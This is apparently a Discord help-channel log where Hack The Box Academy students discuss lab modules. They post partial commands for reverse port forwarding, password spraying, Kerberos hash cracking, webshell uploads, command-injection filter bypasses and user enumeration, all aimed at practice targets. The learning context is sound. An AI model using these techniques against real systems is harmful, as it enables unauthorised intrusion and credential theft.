#modules

1 messages · Page 358 of 1

civic hamlet
#

Is there anyone available , i need help

shut vapor
crystal notch
#

Hello I am doing actually Module about attacking common services and I am in part attacking SQL databases I have access with mssqlsvc user I have printed a flag but is kind missing some part, is there a possibility to change formatting in sqlcmd that I can see whole output or there is a problem with a flag in this module?

safe star
#

Try mssqlclient

viral lotus
#

Hi all, I am still going through the pivoting module 🤦‍♂️, and I am struggling from reverse port forwarding and beyond. I know ligolo gets round havine to use SSH -R but I want to understand how to do these techniques anyone know of any resources that are good for pivoting, tunneling and port forwarding? I tried youtube but I haven't really found anything great… I posted in the resources section but got redirected here. I’m struggling to understand why my call back isn’t working even when I verified the back up script is on the target. I can’t move onto double pivot until I get it. So I’m looking for some material to gain a better understanding so I can answer it for my exams in the new year. Thanks

opal nexus
viral lotus
cloud urchin
viral lotus
#

but isnt -D dynamic port forwarding rather than -R being reverse/remote?

cloud urchin
#

port forwarding goes one way

safe star
#

Mostly proxychains

viral lotus
#

I know but I am trying to understand all techniques taught but I am struggling posted various times, so I used another tool. I am not trying to get a quick answer I wqant to understand why what I am currently doing for this one section doesn't work. I used proxychains in the subsection: Dynamic Port Forwarding with SSH and SOCKS Tunneling. I am trying to grasp why in Remote/Reverse Port Forwarding with SSH, I cant get the call back to my nc listener or if I set up my meterpretr reverse shell it won't work

#

if I done all the pre-reqs dor that subsection should this be the correct syntax: ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.9.2 -vN?

safe star
#

yeah that looks correct

#

lemme check

viral lotus
#

think I know where I have gone wrong I was settintg up the python 3 http server on my local vm not on the pivot could be where my error is

#

ill re-run it, just re-read the section

#

I could RDP into the next host but it wouldn't go to my meterpreter. I now know why

untold light
#

In the "cracking passwords with hashcat" "Skills assessment-Hashcat" module it has me deicpher a Kerboros TGS ticket. where does the hash start? I tried the complete hash with mode 13100 and Rockyou word list. As well as masks and rules. No luck so far. Am I doing something wrong?

#

When I put the hash in ' ' or delete the beginning it shows me a "Separator unmatched" error

cloud urchin
#

i've only seen that error when the hash or mode is wrong

rustic sage
#

Guys I'm in ad enumeration module, ACL abuse tactics

I keep trying to change damumdsen password but it says there is no user found

#

But I'm able to see it's there with other commands. I already reset vpn and target

untold light
lusty thicket
#

at the end

untold light
lusty thicket
#

referencing the above link

#

try it like that

untold light
#

I did multiple times

#

But no success

#

Tried Rockyou, the infreight mask and multiple rules

safe star
#

i just copied and pasted the exe through the rdp session and got a nc shell

untold light
#

Mode 13100 is correct?

lusty thicket
untold light
#

Ok, I tried the example hash. I get the "no hash loaded" error and "Separator unmatched

#

Ok, seems the example hash works when I put it in ' '

low star
#

I am passing Linux Fundamentals module. I have a question: Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option). I answered "--login" to this question but it is incorrect. The correct answer is "--command", WHY?

untold light
#

It takes the hash from htbacademy as well but ko success and status=exhausted

#

Do I need something special for the TGS? I ran it with rules but it says 13h

fathom pendant
#

Generally takes~ 30minutes at most to crack the crackable pws

untold light
fathom pendant
#

If there's a pw list given by the module, use it, otherwise typically it's in rockyou

#

Or any other list that may be mentioned in the section

lusty thicket
low star
plain charm
#

Hello, I am stuck on DNS Zone transfers submodule of Information Gathering - Web Edition Module. I keep getting the Status:NXDOMAIN error when I query inlanefreight.htb using dig. I also not able to get any Name servers. Maybe I am doing something wrong

#

A tiny hint will be appriciated

cloud urchin
untold light
cloud urchin
#

that error shows up when the hash or mode is wrong

untold light
lusty thicket
cloud urchin
untold light
cloud urchin
untold light
untold light
#

And I don't want to try all in the SEC list repo

#

I would post a screenshot but even after the account link and restart it won't let me

fathom pendant
#

Linking the account on the website doesn't do anything you need to follow the #welcome instructions

spare tendon
#

Hi everyone,

Can someone help me?
I am on the module 'Information Gathering - Web Edition' and on the chapter 'Virtual Hosts'.
Can you help me on how to do Brute-force vhosts on the target system. I tried with the command:
gobuster vhost -u <IP-AND-PORT-TARGET> -w /usr/share/secList/Discovery/DNS/subdomain-top-1millions-11000.txt --append-domain

But I get nothing.
Can someone give me a clue?

lusty thicket
#

your wordlist is also a bit massive

#

you’re using append domain but didn’t specify a domain to append

spare tendon
#

For DNS, how to do because I tried to add in /etc/host but the name inlanefreight.htb is not resolved
otherwise, how to do?

and how to specify the domain to add?

wooden perch
#

I'm stuck on this one "Attacking Domain Trusts - Child -> Parent Trusts - from Linux", I need to find out the Parent DC IP to proceed but I don't know where to find it

untold light
fathom pendant
#

Also idk if you need to use any rules

lusty thicket
untold light
fathom pendant
#

rockyou.txt.tgz

untold light
untold light
rustic sage
#

Is there a bug in the module acl abuse tactics?

fathom pendant
rustic sage
#

Bc I am following the commands and they all work up to the command to change password of user damumdsen where it says user not found. But I can see the user I queried it with powershell

#

I changed to wley

fathom pendant
#

Who is damumdsen?

#

:)

rustic sage
#

User damundsen

fathom pendant
#

Make sure you're spelling it right then

rustic sage
#

Yes rn I'm on mobile and it's autocorrecting words

#

On laptop I'm copy pastying

#

But why does it say user not found if it's literally there and I can query it

fathom pendant
#

¯_(ツ)_/¯

rustic sage
#

Can I know if it's a bug

wind torrent
#

why this taking so long??

lusty thicket
rustic sage
#

Did u finish the module?

lusty thicket
lusty thicket
rustic sage
lusty thicket
wind torrent
rustic sage
#

If you never did the machine you can't know if it's a bug

lusty thicket
lusty thicket
rustic sage
lusty thicket
rustic sage
lusty thicket
fathom pendant
#

Those are the only ones that can tell you 100%

compact patrolBOT
wind torrent
lusty thicket
wind torrent
spare tendon
rustic sage
fathom pendant
wind torrent
fathom pendant
#

inlanefreight.htb:port

vivid sigil
#

Hi

Active Directory Enumeration & Attacks / Internal Password Spraying - from Windows

Q: Using the examples shown in this section, find a user with the password Winter2022. Submit the username as the answer.

i try this and did not word

PS C:\Tools> . .\DomainPasswordSpray.ps1
PS C:\Tools> Invoke-DomainPasswordSpray -Password Winter2022 -Domain INLANEFREIGHT.LOCAL -OutFile spray_success -ErrorAction SilentlyContinue

[*] Could not connect to the domain. Try specifying the domain name with the -Domain option.

spare tendon
#

in my host file:
94.237.63.109 inlanefreight.htb

lusty thicket
#

i swear this is written somewhere in that module

spare tendon
#

It's ok, I found the problem

lusty thicket
#

awesome

civic steeple
#

thoughts on working through a pentest with chat gpt? do's and don'ts? specifically in the labs at the end of the modules. Is there a better way?

rustic sage
cloud urchin
plucky wharf
#

anyone got tele

cloud urchin
plucky wharf
#

ok

civic steeple
plucky wharf
#

it says i dont have permison

cloud urchin
wild sage
#

Can someone help me with the first question with the Laudanum question on the Shells and Payloads module. I'm following the module, but when I do the upload without deleting the comments I get a 404 message. When I delete the comments and art I get runtime errors

ancient ermine
#

:hacker:

brazen apex
#

Experiencing difficulties in module #Attacking Common Services section SMB. I thought all that was required to download an SMB file within a share was read permissions, is this not the case?

misty current
wild sage
#

I add the ip of the target as in the module says

#

Other than deleting the comments and art, im not sure if the file needs anymore editing

misty current
#

Shouldn't it be the IP of your VPN interface? I don't really remember. Point me to the section link

wild sage
#

Hold on let me try something

misty current
#

Yeah, it tells you to add the IP address of your academy VPN

#

Not the target

wild sage
#

Ahhh, okay I guess I missed that part

#

ooops

#

@misty current Thank you, I can figure out from here

alpine ingot
#

I dont know what im doing wrong.
Im doing the Attacking Common Services - Easy and i have gotten to the database, and got the webshell but im not able to interact with it.
it says:
The requested URL was not found on this server.
Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 Server at 10.129.156.99 Port 80
When i try to go to <ip>/webshell.php

I used the mysql webshell upload command found in the attacking sql portion but i edited the directory location to what was found in the txt file found on the site.

#

the fact that this challenge is labeled easy is incredibly humbling.

sleek urchin
#

Doing DACL Attacks I: Skills Assessment and got some WriteDacl to exploit, and only have the user hash from mimikatz and I get that error

#

does anyone know what could be the issue ?

safe star
#

did you put it in the right directory?

alpine ingot
#

i put it in here Directory|| "C:\xampp\htdocs"||

#

it showed the ||apache directory in the WebServersInfo.txt||

#

but im so lost right now

#

boutta put a webshell in every damn folder on that computer

cloud urchin
safe star
lusty thicket
sleek urchin
cloud urchin
sleek urchin
cloud urchin
#

i also am not sure you're using the right user

sleek urchin
#

NT Authority

cloud urchin
#

well there you go

#

nt authority isn't a domain user, it has no permissions over users

#

plus there is no domain nt authority user

#

so it says invalid creds

#

use a domain account

sleek urchin
#

but i had this issue where mimikatz won't work except as NT user, and I had to use psexec .\PsExec64.exe -i -s cmd.exe to spawn new cmd

#

did you use other tool to get the pass ?

cloud urchin
#

ok that doesn't change anything

sleek urchin
cloud urchin
#

ok i see now

#

i think you were a bit further than i was looking, so i did use a hash but you can't use nt authority on domain stuff

#

nt authority has permissions over the local system thats it, not any domain objects

sleek urchin
#

I submitted the hash as an answer of one of the question and it's correct, but I think owneredit.py doesn't like the syntax

#

I could ber wrong

restive estuary
#

Yo

civic hamlet
#

yoooo

#

Pentest notes chall , web category , anyone can guide me !

cloud urchin
#

no spoilers please

plucky latch
#

That wasnt a spoiler, those answers are all wrong

#

The answers are not lining up with the questions

#

for previously completed modules

cloud urchin
#

they must have updated the module since you answered then

rustic sage
#

Guys

#

This is a hacking server right?

lusty thicket
#

your question doesnt make any sense

rustic sage
#

How does it not?

#

“This is a hacking server right?”

#

Okay so it’s a question

lusty thicket
#

yes, please

#

compose your question in a way that makes sense

rustic sage
#

Is this a hacking server

#

It can NOT get any more simple than that

lusty thicket
#

im asking you

#

are you sure you're not lost?

safe star
#

😭

rustic sage
#

how can i use Fierce to check for zone transfers? the module doesn't go in depth on this.

I tried fierce --domain inlanefreight.htb --dns 10.129.203.6
but it didn't work.
Here 10.129.203.6 is the resolver/target

lusty thicket
#

its not built for that

rustic sage
#

the module says "Tools like Fierce can also be used to enumerate all DNS servers of the root domain and scan for a DNS zone transfer"

civic steeple
#

just completed Footprinting in the Pentesters course. Looking for suggestions, do I continue to the next module or try 1-2 easy boxes? I've done the first four modules and haven't done any HTB boxes outside of the modules.

rustic sage
#

You can try Granny/Grandpa. They are fun easy boxes I reckon

lusty thicket
#

thats where its usefulness ends

rustic sage
#

so manually checking for zone transfers is the go?

dark hedge
wintry skiff
#

Need help with the ids/ips module

#

Using snort fundamentals

#

Trying to use snort rules to find the pcap file but idk if I’m writing it wrong

rustic sage
#

Can tariffs affect hackthebox discord server?

rich lark
#

I think this is the wrong chat for that question. It’s also very vague.

#

But to answer the question shortly and with my personal opinion, no

hushed atlas
#

Do I need a role

cloud urchin
hushed atlas
#

Okay, thanks @cloud urchin

vapid thistle
#

I have a question regarding https://academy.hackthebox.com/module/109/section/1037 and character shifting:
Despite the explanation about character shifting with echo $(tr '!-}' '"-~'<<<[) I was not able to run any payload equivalent to ls $(tr '!-}' '"-~'<<<.) . Can anyone highlight me on how to encode or amke the $(tr '!-}' '"-~'<<<.) part work?

normal sand
frozen hamlet
#

can anyone provide any hints on skills assessment Q1 of Intro to Whitebox Pentesting? been stuck on this for a couple days and had no luck searching for hints 😦

#

i'm trying to target the ping function but can't seem to properly escape to get command execution

lone pivot
#

Hi

#

I checked out modules why can't I type in general

storm elk
#

Because you didn’t read #welcome and followed instructions 🙂

lone pivot
#

Mid server

cloud urchin
#

why so mad

lone pivot
#

😞

#

Sorry

storm elk
#

lol

lone pivot
#

Pls don't dox

#

😶‍🌫️

storm elk
#

If you have a HTB account , identify yourself and your HTB name will show here

lone pivot
#

What is that

storm elk
#

Or just change your username handle, that works too. But you need to identify yourself before you can chat in #general

lone pivot
#

Are you a bot

storm elk
#

No

lone pivot
#

Cap

cloud urchin
#

that's what a bot would say though

lone pivot
#

Where my proof

storm elk
lone pivot
#

Lol

storm elk
#

Jk. None of us are bots

lone pivot
#

Why did you edit

storm elk
#

Because I made a typo. Wrote bit instead of bot

vapid thistle
normal sand
vapid thistle
paper lodge
#

Hi guys, can any one help me with this question, it's from the Linux priv escalation module "Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer."

vapid thistle
paper lodge
#

I tried using the command 'grep -r HTB' can you please give me some hints

red shuttle
#

hi! have you solved lab? cant connect using nc

fathom pendant
#

You need to specify the source port to connect with

red shuttle
red shuttle
midnight galleon
#

academy DNS down?

#

or did i mess up my dns

bright coral
autumn pilot
#

usually, when you get this type of an error it is client-side related

storm elk
#

thanks @fathom pendant and @midnight galleon

rustic sage
#

Hi, I've spent lots of time to get this to work but all in vain:

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.```

Any help will be appreciated
#

I have tried usernames as ./htbdbuser , htbdbuser

misty current
#

SharpUp just does the permission check behind the scenes and tell you what all you can abuse and doesn't exactly list the permission to you in the front (unless there's an flag for it but idk). Also, about the course cherry picking it is because it could have been random if there were a lot of results but in the case of the course, it was the only one which demonstrates service binaries that can be modifed by the current user

rustic sage
#

This is attacking common services - SQL Databases

misty current
#

I guess your problem is, you're trying to login to the MSSQL with -windows-auth which requires the user's machine where you execute this command to be part of a trusted domain or to have a valid Kerberos ticket digested.

rustic sage
#

the prerequisite of the exercise is :
Authenticate to 10.129.203.12 (ACADEMY-ATTCOMSVC-WIN-02) with user "htbdbuser" and password "MSSQLAccess01!"

#

I don't know how I am supposed to authenticate other than that

misty current
#

I think that's just a local MSSQL login

#

try it without the -windows-auth

rustic sage
#

i can login as that, but I need privs on the database to access flagDB, and I got a nudge that authenticating to Windows could get me privs

#

more privs to accessing DB

empty trout
#

have anyone tried findstr for hiding data in ADS

reef pecan
tranquil axle
reef pecan
urban elk
misty current
slim carbon
#

hello

storm elk
#

hello @slim carbon

slim carbon
#

How are you ? @storm elk

storm elk
#

all good - but this is a channel for supporting people with Academy modules. Please read and follow #welcome to get access to general chat

#

How are you? 🙂

slim carbon
#

exactly what the Academy is for

slim carbon
slim carbon
storm elk
slim carbon
#

Does it also work for French people?

storm elk
#

It works for everyone who speaks english

slim carbon
#

What if we don't speak it fluently?

storm elk
#

Should still work - there are always sites that can help you translate

slim carbon
#

yes like google translate

#

and what exactly does the site consist of?

#

?

storm elk
#

Please check the website, you will see what is on there

slim carbon
#

ok thank you very much for the information

#

see you soon

rustic sage
#

Thankyou!

vagrant kite
#

ok so im putting the answer in this textbox but it says its incorrect 💀 can somebody explain to me what im doing wrong

#

heres the info of the machine to which im connected with RDC

analog dock
vagrant kite
#

its the module 49 and section 454 incase somebody needs it

fathom pendant
fathom pendant
vagrant kite
#

done???

fathom pendant
#

Sure

#

Just giving you helpful tips for the future

vagrant kite
#

tysm!!

fathom pendant
#

That way if you get stuck again, people will be more readily able to help

vagrant kite
#

tyy!

tranquil axle
#

you are being to detailed

#

see how it says "ie Windows X"?

fathom pendant
#

;)

#

Careful of spoilers

orchid mist
#

Hi everyone!
I'm Elizabeth from South Africa
I'm a business owner and also passionate about business
I'm here to learn more about programming

stiff bone
#

Hi everyone! Who can I contact for help with the NTLM Relay Attacks Skills Assessment module? I'm stuck on the last question and either can't put all the findings together or I'm just jaded and out of ideas.

quick surge
#

Hey people currently doing information gathering web edition but got stuck on the web archives section answer field wont accept Palm Organizer for the paypal bit

#

any and all help appreciated : )

tranquil axle
mystic narwhal
#

Hello everyone!
Can someone help me with the last question of the skills assessment of the DACL II module?
I have the ntlm hash of the ||tangui|| user, i suppose i have to do samaccountname spoofing, but i can't create a computer account and i can't modify the existing ones owned by ||tangui|| user. Any suggestions?

tranquil axle
flat patrol
winter schooner
#

Hello, I'm stuck on (AD Enumeration and Attacks) Credentialed Enumeration - from Windows.
When I'm using SharpHound to generate the .zip file, it just produces a bunch of .json files. And when I try to convert the .json files and compress them all into one .zip file, it doesn't show anything in BloodHound.

lusty thicket
winter schooner
lusty thicket
#

blood hound expects the json files to be at the root of the archive

winter schooner
terse breach
#

good day everyone!

#

I want to ask some help regarding one problem

lusty thicket
terse breach
#

is it possible to trace location by Bitcoin wallet?

#

because one person wants to scam me badly and sent me her Bitcoin wallet

#

and since I want to report her to police, I need to get some of hers personal data

urban elk
#

no you don't

lusty thicket
analog dock
#

Surely they’ll send it to you yeah

quick surge
terse breach
#

all I have is her probable name, facebook account and bitcoin wallet

lusty thicket
#

awesome

terse breach
#

worst is that she uses "Sex scam" ... like, she will pay you for hook up, but you have to send her 80 dollars on BTC wallet OR Steam Gift Card

analog dock
#

Just report it to authorities or something

terse breach
#

exactly, to report her I need her personal data

#

I live in Estonia btw

urban elk
#

no you don't

lusty thicket
#

how can i start

terse breach
#

no, she does not

analog dock
#

Anyways

#

We can’t do anything about it

lusty thicket
terse breach
#

ok

urban sage
cold marsh
#

does anyone know why i have always this error with mimikatz
Program 'mimikatz.exe' failed to run: The specified executable is not a valid application for this OS platform.At
line:1 char:1

urban sage
#

Are you actually trying to run the executable?

cold marsh
#

yes

urban sage
#

Double check. That error doesn't sound like you have a valid exactable.

cold marsh
visual umbra
#

After a lot of swearing and frustration.. 😄 Thought I was going crazy, but it was all about me running via VPN instead of pwnbox... 😄

wide hedge
#

Hi, im learning the linux fundamentals module and when I try to connect via ssh I get an error, could someone help me?

urban elk
#

what's the error

wide hedge
#

ssh: connect to host 10.129.45.245 port 22: No route to host

urban elk
#

guessing you're on your own machine / VM, did the VPN start correcty ?

wide hedge
#

Yeah I think so, I get this message in the terminal "Initialization Sequence Completed"

quick surge
viral lotus
#

on the double pivot section of Pivoting, Tunneling, and Port Forwarding, is it common for the .155 box to drop out a lot?

quick surge
#

ive tried it with spaces,nospaces,using caps and no caps,with the TM and without no idea why it wont work

lusty thicket
quick surge
#

there is only 1 archive for october 1999 and thats the only thing on it

quick surge
#

its also the only thing with TM in the name

quick surge
lusty thicket
#

but still not in the right format

#

look harder

quick surge
#

oh my days

#

actual brain damage O -- 0

quick surge
lusty thicket
quick surge
#

i quit computers

#

returning to the st 0 ne age

cold marsh
#

Anyone can help me?
im doing kerberoast and i receive this error
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

cold marsh
#

googled. does not work any solution, im using proxychains

lusty thicket
cold marsh
#

yes

analog dock
#

And can you reach the dc?

cold marsh
#

attacking entrprise network - active directory compromise

#

i can reach via proxychains from the machine where i want to kerberoast

buoyant escarp
#

currently im in the skills assessment for "Information Gathering"
my QA fields are totally bugged, i havent touched this box previously but there are already answeres entered, but wrong ones and now i cant enter the actual answeres...

fathom pendant
buoyant escarp
dense tundra
#

I have a question about Pro lab Zephyr. Is there a channel on this server where its appropriate to ask these kinds of questions?

fathom pendant
fathom pendant
dense tundra
#

ahh ok

#

thank you

misty current
midnight galleon
#

faketime temporarily set time to anything u specify for the next command, the ntpdate part takes the time from the dc ip

#

it has

fathom pendant
#

It should be at the bottom, if you answer all the questions

midnight galleon
#

did u complete all questions?

midnight galleon
#

ur pivot is not working

#

do proxychains ping ip

shut quest
#

icmp works over proxychains?

midnight galleon
#

not sure

#

but since nmap works ig yes?

#

but yeah u -Pn nmap so prolly no

#

ok do proxychain nmap ip -sn -Pn

cold marsh
midnight galleon
#

btw iirc u can use external ip of dc to get time

shut quest
cold marsh
#

😐

cold marsh
lusty thicket
misty current
#

Your best bet for HD over proxychains is full TCP connect scans

analog dock
lusty thicket
shut quest
#

Even doing the common 5 ports it'll take a while.

midnight galleon
#

academy vpn from inside vm 👀
suddenly stopped working

#

using NAT

#

normal internet works

#

how can i fix it?

shut quest
#

Redownload config?

midnight galleon
#

did so

shut quest
#

Try different server?

midnight galleon
#

changed area too

shut quest
#

restart? ¯_(ツ)_/¯

midnight galleon
#

restarted

#

seems like a DNS thing

shut quest
#

Prepare 3 envelopes, get divorced, hit the gym.

lusty thicket
#

have you verified you have access to internet?

midnight galleon
midnight galleon
shut quest
#

Make sure your DNS is working?

lusty thicket
midnight galleon
lusty thicket
midnight galleon
lusty thicket
#

check ovpn logs

#

switch from NAT to bridged mode

midnight galleon
#

now nothing works

#

good step

spare tendon
#

hi everyone,

could someone give me a hint on the skill assessment of Information Gathering - Web Edition on the part: What is the API key in the hidden admin directory that you have discovered on the target system?

#

I've been on it for a few hours

spare tendon
plain trellis
#

I used ffuf

winter schooner
#

and make sure to add the subdomain to your /etc/hosts and enum that subdomain for more directories and subdomains

spare tendon
pastel widget
#

so im going through this

#

and in the learning mod it links a "learning pyramid" article. the mod itself is using it as some sort of source for active and passive learning types, but the whole wiki article is just shitting on it as a "group of ineffective[2] learning models and representations relating different degrees of retention induced from various types of learning."

#

not exactly a good start lmao

#

okay, so instead of a staff member addressing what is a pretty big hit to credibility to these courses within the first 5 minutes of reading, you just randomize my nickname. beautiful stuff

storm elk
#

Sorry, but not all staff/moderators can address your issues.

pastel widget
#

well you see, you've got this ability to contact any level of staff while a person like me is unable to even type in the general chat, so you saying "you can't address it" is a bad look

storm elk
#

I can’t contact any level of staff. You being unable to talk in #general is just because you didn’t read and follow instructions in #welcome

#

Most moderators here on the discord are volunteers

pastel widget
storm elk
pastel widget
#

waited a second for your response or to see if you were going to type, guess not. so please don't lie about your inability to contact other members of staff, it's a bad look.

tranquil axle
pastel widget
opal nexus
#

In API Attacks --> Broken Authentication section, - I'm not sure how am i supposed to bypass the OTP authentication, which it requires email/phone access which I do not have.

pastel widget
#

entire section dedicated to a "learning pyramid" that apparently is on par with the 2000s food pyramid shit that kids were forced to learn about

tranquil axle
fathom pendant
storm elk
pastel widget
neon furnace
fathom pendant
#

No need to have your panties in a twist

#

If it contained non-ascii/English characters it gets changed

neon furnace
#

Although yeah, I agree that its kinda useless content based on the description

fathom pendant
#

It's as simple as that

pastel widget
fathom pendant
fathom pendant
#

¯_(ツ)_/¯

storm elk
#

I changed it as it was all question marks.

pastel widget
#

not in this situation

fathom pendant
pastel widget
#

color me shocked

#

i guess im capable of finding out whether or not an action was automated

#

crazy

fathom pendant
#

And mod ≠ staff

storm elk
#

And as I said before, not every moderator can help you with content stuff. I am a volunteer and not staff.

fathom pendant
#

/feedback is useful as well

storm elk
#

No need to be rude about stuff.

fathom pendant
#

But overall it's just a small portion of the overall course, everyone learns a little differently

#

It's not that deep

pastel widget
#

yeah we're going in circles now. i already said something to this response as well, i offered 5k for you to prove you don't have a channel to communicate with non-volunteer staff, and you didnt take me up on it.

this kind of the issue with butting into conversations that you aren't willing to read the context on, it just leads to words being repeated

lusty thicket
fathom pendant
pastel widget
#

for you

#

jesus christ man lmao

pastel widget
#

this is why you need to read convos before giving your opinion

fathom pendant
#

You're just an entitled twatmuffin

pastel widget
#

lol

fathom pendant
#

That's what I gathered from what I've read

#

:)

storm elk
#

Right, let's move on

lusty thicket
pastel widget
#

i think this intro course has a section of handling frustration, can someone link it for him

lusty thicket
neon furnace
#

I can ping the mods for you for 5k Kappa

fathom pendant
pastel widget
acoustic owl
#

I think we should now return to the topic of this channel.
I recommend that you read and follow #welcome. Then you will also have access to the #general channel.

fathom pendant
#

Either way, you were informed of a better way to report things you feel are off. And modules also have a review when you finish them.

pastel widget
spare tendon
#

@winter schooner can you help me?

fathom pendant
#

I just call it as I see it

fathom pendant
#

¯_(ツ)_/¯

#

Anyway gotta get back to packing

pastel widget
#

perhaps because im a believer in the Handling Frustration module

fathom pendant
#

Who said I'm emotionally invested? Lmao

storm elk
#

Right guys, lets move on

opal nexus
storm elk
#

Dm me and I will help

fathom pendant
#

I.e. generating a list of 0000 to 9999

opal nexus
storm elk
#

make a list from 0000 to 9999

fathom pendant
#

Or at least I've seen others talking about it

dark hedge
#

the email in that section is the scenario you are working with

#

you assume that you receive a similar email

granite glade
#

Why cant i write in general

acoustic owl
urban barn
#

Hello, I'm solving the DNS footprinting. i got all most all the answers, but im stuck on the last question. Which is: What is the FQDN of the host where the last octet ends with "x.x.x.203"?
Please me out, I tried all the mentioned methods. But still no Luck yet.

acoustic owl
lusty thicket
#

dont know if that makes sense

urban barn
#

😕

fathom pendant
#

That's really the best hint that can be given without a direct spoiler

winter schooner
rustic sage
#

Ad attack - miscellaneous misconfigurations - second question

I found the hash but I can't crack it, I used the command given in the module with rockyou.txt and another wordlist that I don't remember but it isn't cracking.
Hashcat gets exhausted after a while and john doesn't even recognize the hash, I also tried kirbi2john but it's the same.
Now I used a?a?a?a?a?a?a?a? and its still going after a good 30 minutes

#

I cracked the hash of mmorgan almost immediately with hashcat, idk what's going on with this one. Yes I copied the hash correctly in multiple files but it's still the same thing

rustic sage
# lusty thicket what does the question say

Find another user with "do not require kerberos pre auth setting" enabled. Perform aspreroasting attack against this user, crack the hash and submit the clear text password as the answer

fathom pendant
#

Why are you using a mask?

#

You shouldn't need to use any sort of mask to crack it

rustic sage
#

I don't remember the name tho

fathom pendant
#

Also are you sure it's a hash you're meant to crack?

rustic sage
#

It's the user that starts with y

#

It's the only other user

fathom pendant
#

Ay

rustic sage
fathom pendant
#

Nvm, i just checked the password should he in rockyou from what I recall, and you performed an ASREProasting attack yeah?

rustic sage
#

Rock you gets exhausted with hashcat

fathom pendant
#

I believe there may be another user but it shouldn't miss it

rustic sage
#

Mmmmmmmmm

#

Is the user in the second target?

#

I wasn't able to access it

fathom pendant
rustic sage
#

Aight

#

I'm looking at powershell rn and there's only mmorgan and y

#

I also tried hashcat on the pwnbox same thing

fathom pendant
#

Give me a few minutes and I'll check and see if I have the hash saved

rustic sage
#

Thx

rustic sage
#

No fucking way

#

Ye I'm an idiot it cracked

#
└─$ smtp-user-enum -M RCPT -U users.list.1 -D inlanefreight.htb -t 10.129.119.250
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.list.1
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb

######## Scan started at Mon Dec  2 17:47:03 2024 #########
######## Scan completed at Mon Dec  2 17:48:23 2024 #########
0 results.

79 queries in 80 seconds (1.0 queries / sec)
                                                 
┌──(kali㉿kali)-[~]
└─$ smtp-user-enum -M RCPT -U users.list.1 -D inlanefreight.htb -t 10.129.197.255
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.list.1
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb

######## Scan started at Mon Dec  2 17:49:22 2024 #########
10.129.197.255: fiona@inlanefreight.htb exists
######## Scan completed at Mon Dec  2 17:49:46 2024 #########
1 results.

79 queries in 24 seconds (3.3 queries / sec)
                                                 
┌──(kali㉿kali)-[~]
└─$ ```

Why do I need to reset the lab sometimes to get it working?
shut vapor
#

I don't know for certain, but I imagine something hiccups when the deployment script is running and derails the process of setting up a lab. I haven't seen it often but it is maddening when encountered.

rustic sage
#

Yeah, it misleads. I had to totally shift my approach for enumerating

midnight galleon
#

Can I dm someone about AEN module?

safe star
viral lance
#

Hi!
Anyone who can help me with the module of web application pentester senior. In the module XSS Filter by passes?
I was able to find the payload to bypass the filter and I am receiving data in the exfiltrate server
but I am gettingNetworkError: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'http://vulnerablesite.htb/home.php'
I tried many ways but I got nothing.
Help please 😦

gaunt temple
#

Module name: Kerberos Attacks
Section: Unconstrained Delegation - Users

Hi guys,
I would really appreciate some help with this section. Whenever I get to the part where I’m running dementor.py, or printerbug.py- I get an error on krbrelayx.py saying
“Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'”
And essentially I’m not getting a TGT.
I tried **every **possible solution I could find online and I still cant figure it out.
I tried restarting the machine a few times, and also tried the lab both from the pwnbox and from my own kali lab.

-made sure that the hosts file has a record for inlanefreight.local and dc01.inlanefreight.local
-when creating the DNS record I used NSLOOKUP to make sure that it resolves to my IP
-when creating the fake SPN, I made sure that it exists by using addspn.py to query callum.dixon
-tried running krbrelayx.py with callum.dixon’s user/pass or hashes
-re-installed impacket

would appreciate any help!!!!
thank you

safe star
lusty thicket
gaunt temple
lusty thicket
gaunt temple
sleek urchin
vagrant wraith
#

Hi guys currently doing (Attacking Common Applications , Attacking Splunk ) module yet right after uploading a Python or a PowerShell script i yet still dont have a shell back not sure what im doing wrong

gaunt temple
lusty thicket
#

no it doesnt

vagrant wraith
#

yes i have

vagrant wraith
#

as a rev shell

lusty thicket
#

yes

safe star
vagrant wraith
#

havent looked into that one yet

vagrant wraith
safe star
#

it should all be in one zip file

#

just point the input.conf to the script you want to run then zip

vagrant wraith
#

ill try it out thanks man

signal pike
#

In the Password attacks module, the easy lab, when I try to brute force the FTP, I get nothing and it takes so much time, I went searching of what to do, but i run the same command as other people, why it does not work for me? I tried using the lists from the module and mutate the list too

misty current
lusty thicket
green spoke
#

@surreal rain @urban sage hey guys could you please add me back and answer my dms

#

it’s urgent

grave tinsel
#

Hi, can you help me?

machine 10.10.11.42 Administrator
I logged in with the user michael with evil-winrm
I was able to change the password for benjamin and I logged in with smbclient
but I'm stuck there and I can't move forward

cloud urchin
#

best to post the module/section you're on

unborn bear
#

Hello! Working on the web request module, to download using curl i am saying (curl -0 IP/download.php) however i cant find the download or tell if it is downloading

cloud urchin
#

it'll download to whichever location you specify with your -O parameter, if you don't specify a folder and only a file then it'll save in your current working directory

unborn bear
cloud urchin
#

you can type pwd to print the working directory

unborn bear
#

so it showd that my working directory is downloads but when i do -ls there is no files

cloud urchin
unborn bear
cloud urchin
#

k so first, don't post spoilers like the flag

#

second, you're using 0 not O.. O is for Output

#

so use -O not -0

#

and you also have to specify the file name in the output

#

curl http://website.htb/file.exe -O file.exe

unborn bear
#

oh, i see that maes sense. thank you

safe star
junior flicker
#

